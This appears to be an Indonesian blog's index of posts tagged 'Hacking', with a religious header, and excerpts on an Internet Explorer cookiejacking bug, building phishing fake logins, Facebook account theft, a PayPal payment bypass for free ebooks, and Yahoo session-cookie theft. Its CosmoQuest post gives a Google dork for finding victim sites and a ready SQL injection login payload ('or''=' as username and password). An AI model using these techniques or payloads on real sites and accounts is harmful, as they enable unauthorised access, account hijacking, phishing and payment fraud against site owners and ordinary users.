PENTING!!!


Rukun Iman terdiri dari enam perkara: (1) Iman kepada Allah. (2) Iman kepada malaikat-malaikat Allah. (3) Iman kepada kitab-kitab Allah. (4) Iman kepada rasul-rasul Allah. (5) Iman kepada hari kiamat. (6) Iman kepada Qada dan Qadar.

Rukun Islam terdiri dari lima perkara: (1) Mengucap dua kalimat syahadat. (2) Menunaikan shalat lima waktu. (3) Mengeluarkan zakat. (4) Berpuasa pada bulan Ramadan. (5) Menunaikan Haji bagi mereka yang mampu.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Microsoft Meremehkan Cookiejacking Vulnerability pada IE

Microsoft sudah tidak mempertimbangkan kehadiran bug pada Internet Explorer yang memungkinkan terjadinya serangan hijacking, tapi para peneliti keamanannya berpikir lain dengan melihat pengalaman yang sudah-sudah mendukung pendapat mereka.

Minggu lalu pada Hack in the Box security conference di Amsterdam, peneliti keamanan dari Italia, Rosario Valotta men-demo-kan serangan yang memanfaatkan zero-day vulnerability pada semua versi Internet Explorer untuk pencurian session cookies.

Session cookies adalah file teks berukuran kecil yang digunakan oleh website untuk melacak authentication user/pengguna. Dengan memiliki akses terhadap session cookie, attacker dapat mengendalikan (memiliki akses) account korban.

Oleh Valotta, serangan ini diberi nama cookiejacking karena menggabungkan bug pada IE dengan teknik clickjacking.

Pada dasarnya, itu adalah serangan social engineering yang mengelabui korbannya untuk berinteraksi dengan elemen halaman yang dibuat khusus oleh attacker.

Bug pada IE Memungkinkan Serangan Session Cookie Hijacking

Sebuah zero-day vulnerability mempengaruhi setiap versi Internet Explorer yang memungkinkan attacker mengeksekusi serangan seperti clickjacking dalam rangka untuk mencuri session cookies.
Serangan yang dijjuluki cookiejacking ini, diungkapkan oleh peneliti keamanan independen Rosario Valotta pada Hack in the Box 2011 security conference di Amsterdam.

Serangan tersebut tidak berjalan sendiri namun dikombinasikan dengan beberapa teknik-termasuk sedikit social engineering. Bagaimanapun juga, jika dilakuukan dengan benar-hal tersebut terbukti sangat efektif.

Bug pada IE tersebut-terdapat pada browser loading sebuah konten cookie yang jika file yang berkaitan ditampilkan sebagai src untuk iFrame.

Namun sejak penggunaan path cookie tergantung pada user Windows, attacker perlu menentukan nilainya. Valotta menjelaskan metode web yang berbasis vulnerability ini terhadap browser dapat menampilkan username korban.

[Step By Step] Membuat Fake Login

Hi, apa kabar? Akhirnya, setelah vakum selama kurang lebih 3 minggu saya bisa nulis lagi disini. Kemarin-kemarin saya (sok) sibuk fokus ke UTS, mudah-mudahan hasilnya memuaskan. Amin :)

Jika anda pembaca setia blog ini tentunya anda sudah tahu tentang phishing yang saya tulis pada Hacking Facebook Account dan Hacking Facebook Account II yang didalamya terdapat beberapa contoh fake login untuk mencuri data yang diinputkan user. Nah, disini saya masih akan membahas tentang phishing menggunakan fake login, tapi tidak seperti sebelumnya: saya menyediakan fake login siap pakai, kali ini saya akan menunjukan bagaimana cara membuat fake login.

Membuat fake login tidak sesulit kelihatanya, bahkan sangat mudah. Tapi, menurut saya seni dalam fake login adalah bagaimana cara attacker membuat korban masuk dan tenggelam dalam perangkap yang sudah disediakan tanpa pernah curiga.

Baiklah, yang perlu anda siapkan adalah:
  • Halaman fake login
  • Script PHP
  • File *.txt kosong

Hacking Facebook Account II

Ini merupakan kelanjutan dari artikel saya sebelumnya yang membahas tentang pencurian email dan password Facebook serta bagaimana cara kerjanya. Sebelumya telah kita kelompokan jenis-jenis serangan yang marak digunakan attacker untuk mendapatkan account facebook korban:
  • Sniffing
  • Phisihng
  • Scam
  • Keylogger
  • Social engineering
Kemarin saya sudah membahas beberapa diantaranya seperti sniffing dan phishing, kali ini saya akan fokus membahas Scam.

Apa itu scam? Scam adalah informasi yang ada diinternet yang bersifat menipu.

Bagaimana scam digunakan dalam pencurian account facebook?

Saya gambarkan dengan contoh kisah Intan dengan Tarwad dibawah ini.

Hacking Facebook Account

Sebenarnya dari dulu saya kurang tertarik mengangkat topik ini karena:
  • Umum: coba anda perhatikan saat mengunjungi forum, situs maupun blog kemungkinan besar disitu terdapat "Hacking Facebook"
  • Kurang bermanfaat: apa gunannya mengambil account Facebook orang lain? teman? pacar? Toh semua tentang mereka bisa kita lihat lewat account kita, kecuali hal-hal yang bersifat pribadi. Hormatilah privasi orang lain.
  • Ga keren: apa yang akan anda lakukan saat sudah mengambil alih facebook orang teman? mencuri chip poker? mengganti foto profilnya dengan gambar porno? update status menggunakan kata-kata kotor? FU@K THEM!
Mungkin cukup itu alasan saya. Tentunya sekarang anda bertanya "kenapa ditulis?". Selain sedang miskin ide, alasan saya menulis ini adalah untuk sharing agar anda tidak terjebak didalamnya, pencurian account Facebook.

[Hack] Step by Step Bypass Halaman Login CosmoQuest

Menanggapi saran teman saya Hermawan Ramadhan tadi sore yang menyarankan untuk membuat posting yang "jelas" agar dapat dimengerti oleh newbie, kali ini saya akan menjelaskan bagaimana mem-bypass halaman login admin sebuah situs yang disuport oleh CosmoQuest yang saya ambil dari posting saya sebelumnya: CosmoQuest bypass login page Vulnerability.

Catatan: sebelum melangkah lebih jauh, baca dulu halaman disclaimer.

Lanjut, pertama anda harus masuk ke google untuk mencari situs target menggunakan keyword/dork: "Powered by CosmoQuest".







[Hack] CosmoQuest bypass login page Vulnerability

Title       : CosmoQuest bypass login page Vulnerability
Author    : Net.Edit0r
Vendor or Software Link  : http://www.cosmoquest.info/
Date  : 2011-03-29
Google dork : Powered by CosmoQuest
Category :  [Webapps]
Vulnerable File : AdminLogin.asp

Exploit: http://website_target/AdminLogin.asp

user: 'or''='
pass: 'or''='

XSS Vulnerability pada 1.61.channel.facebook.com

02/04/2011 - Edgard Charmmas, seorang peneliti keamanan, telah menyampaikan adanya XSS vulnerability pada Facebook (1.61.channel.facebook.com). Hal ini bertepatan dengan penyerahan website peringkat 2 menurut Alexa.

Secara manual kita dapat menguji vulnerability tersebut yang sampai hari ini (05/04/2011) masih belum juga dibenahi.

Saat mencoba membuka http://1.61.channel.facebook.com/ anda hanya akan melihat tulisan I'll find something to put here. Sedangkan anda dapat mengujinya dengan menambahkan sedikit code seperti dibawah ini:

[Hack] Bypass Pembayaran Paypal Untuk Mendapatkan Ebook Gratis

Jika anda suka berburu ebook atau software tentunya anda penah menemukan suatu halaman download yang sangat menarik tapi untuk mendownloadnya anda diharuskan membayar lewat Paypal.


Nah, disini saya akan sharing bagaimana cara mendowload ebook tersebut tanpa harus melakukan pembayaran.

[Hack] Session Hijacking pada Account Yahoo - Stealing Cookies

Sebelum membaca tutorial ini saya anggap anda sudah mengetahui apa itu session hijacking, stealing cookies dan cookies itu sendiri sekarang anda dapat mencoba melakukan stealing cookies pada account Yahoo.

Pertama silahkan masuk ke www.yahoo.com lalu ketikan kode berikut pada address bar:

javascript:alert(document.
cookie);

Anda akan mendapatkan kotak yang menampilkan pop up cookie yang ditinggalkan Yahoo pada PC anda.

Sekarang login ke account Yahoo anda lalu lakukan hal yang sama seperti diatas. Anda akan melihat beberapa elemen tambahan yang ada pada cookie. Itulah session id anda. Jadi sekarang anda tahu bahwa Yahoo menyimpan session id dalam bentuk cookie pada web browser.
Attacker dapat mencuri session dengan cara meyakinkan korban untuk mengeksekusi sebuah kode dalam browsernya. Kemudian attacker menggunakan session yang dicuri untuk masuk kedalam account korban tanpa perlu memberikan username ataupun password. Serangan ini jarang dilakukan karena saat korban sign out dari accountnya maka attacker juga ikut sign out.